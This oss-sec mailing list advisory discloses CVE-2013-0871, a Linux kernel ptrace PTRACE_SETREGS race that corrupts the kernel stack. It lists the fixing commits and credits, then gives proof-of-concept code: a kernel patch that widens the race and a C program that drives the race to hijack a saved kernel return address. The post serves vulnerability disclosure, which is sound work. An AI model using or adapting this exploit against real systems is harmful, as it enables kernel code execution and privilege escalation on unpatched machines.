oss-sec mailing list archives



Linux kernel race condition with PTRACE_SETREGS (CVE-2013-0871)

Linux kernel stack corruption due to race condition with PTRACE_SETREGS ----------------------------------------------------------------------- A race condition in ptrace can lead to kernel stack corruption and arbitrary kernel-mode code execution. This should be tracked as CVE-2013-0871. Solution ------------ The following commits from Oleg Nesterov should address the issue: - 910ffdb18a6408e14febbb6e4b6840fd2c928c82 - 9899d11f654474d2d54ea52ceaa2a1f4db3abd68 - 9067ac85d533651b98c2ff903182a20cbb361fcb Credit --------- This was discovered by Suleiman Souhlal and Salman Qazi of Google, with help from Aaron Durbin and Michael Davidson, also of Google. Code -------- Salman Qazi provided the following PoC code: Kernel patch for easy reproduction: diff --git a/arch/x86/kernel/ptrace.c b/arch/x86/kernel/ptrace.c index b629bbe..e22617e 100644 --- a/arch/x86/kernel/ptrace.c +++ b/arch/x86/kernel/ptrace.c @@ -24,6 +24,7 @@ #include <linux/rcupdate.h> #include <linux/module.h> #include <linux/context_tracking.h> +#include <linux/delay.h> #include <asm/uaccess.h> #include <asm/pgtable.h> @@ -902,6 +903,12 @@ long arch_ptrace(struct task_struct *child, long request, datap); case PTRACE_SETREGS: /* Set all gp regs in the child. */ + if (!strcmp(current->comm, "ptrace_death")) { + int i; + WARN_ON_ONCE(1); + for (i = 0 ; i < 15; i++) + mdelay(10); + } return copy_regset_from_user(child, task_user_regset_view(current), REGSET_GENERAL, source code for ptrace_death: /* * Repro case for SETREGS arbitrary ring zero execution bug. * * The specific scenario that we attempt to create: * * V does a syscall. It is being traced by P. P * upon stopping V with PTRACE_SYSCALL and waiting for it, proceeds * to read its registers. At this time P is asleep and an RT process S * starts running. * * Then P proceeds to write V's registers, at shortly it has done this * another process K kills V. Process S goes to sleep permitting V * space to run. 
V wakes up from its waiting state and heads for the exit. * But, S quickly wakes up again by the time V has reached schedule(). V * is no longer running (since S has the CPU) * and P modifies its regs. When V finally starts running * and returns from schedule(), it pops an incorrect value from the * stack. The reason is that the stack on which schedule() is called * does not have the final 6 registers in pt_regs on it. That means that * when P modifies V's registers, it is actually overwriting the stack * frame saved for schedule(), including the return RIP. * * V and S and pinned to CPU 0. S is an RT task so that it can control * when V does and doesn't run. * remaining processes are not allowed on 0. * */ #include <sched.h> #include <sys/ptrace.h> #include <sys/user.h> #include <stdlib.h> #include <stdio.h> #include <assert.h> #include <signal.h> /* S */ int nuke_cpu(void) { int pid0; int i; unsigned long mask = 1; pid0 = fork(); if (!pid0) { struct sched_param p = {}; p.sched_priority = sched_get_priority_min(SCHED_FIFO); assert(!sched_setscheduler(0, SCHED_FIFO, &p)); assert(!sched_setaffinity(0, sizeof(mask), &mask)); i = 0; usleep(120000); while(1) { if (i == 50000) { usleep(10); printf("x"); fflush(stdout); } i++; } } return pid0; } int once() { long i; int pid0; int pid; unsigned long mask = 1; struct user_regs_struct regs; assert(!sched_setaffinity(0, sizeof(mask), &mask)); pid = fork(); if (!pid) { /* V */ while (1) { /* Put our chosen RIP in callee saved registers */ asm __volatile__ ( "mov $0x1eadbeef, %%rbx

" "mov $0x1eadbeef, %%rbp

" "mov $0x1eadbeef, %%r12

" "mov $0x1eadbeef, %%r13

" "mov $0x1eadbeef, %%r14

" "mov $0x1eadbeef, %%r15

" "mov $0, %%rsi

" "mov $0, %%rdi

" "mov $0x6d, %%rax

" "syscall":::"rax","rsi","rdi", "r12", "rbx"); } } else { /* P */ assert(!ptrace(PTRACE_ATTACH, pid, 0, 0)); wait(NULL); assert(!ptrace(PTRACE_SETOPTIONS, pid, NULL, PTRACE_O_TRACESYSGOOD | PTRACE_O_TRACEFORK | PTRACE_O_TRACEVFORK | PTRACE_O_TRACECLONE)); while(1) { int nuke_pid; int pid2; mask = 0xfffe; assert(!sched_setaffinity(0, sizeof(mask), &mask)); /*Entry */ assert(!ptrace(PTRACE_SYSCALL, pid, NULL, 0, 0)); wait(NULL); assert(!ptrace(PTRACE_GETREGS, pid, NULL, ®s)); nuke_pid = nuke_cpu(); regs.orig_rax = 0x3c; pid2 = fork(); if (!pid2) { /* K */ usleep(120000); kill(pid, SIGKILL); printf("."); fflush(stdout); exit(0); } printf("{"); fflush(stdout); if (!ptrace(PTRACE_SETREGS, pid, NULL, ®s)) { printf("+"); } else { printf("-"); } ptrace(PTRACE_CONT, pid, NULL, 0, SIGKILL); kill(pid, SIGKILL); kill(pid2, SIGKILL); kill(nuke_pid, SIGKILL); exit(0); } } } int main(void) { while (1) { int pid = fork(); if (!pid) { once(); } wait(NULL); } }

By Date By Thread

Current thread: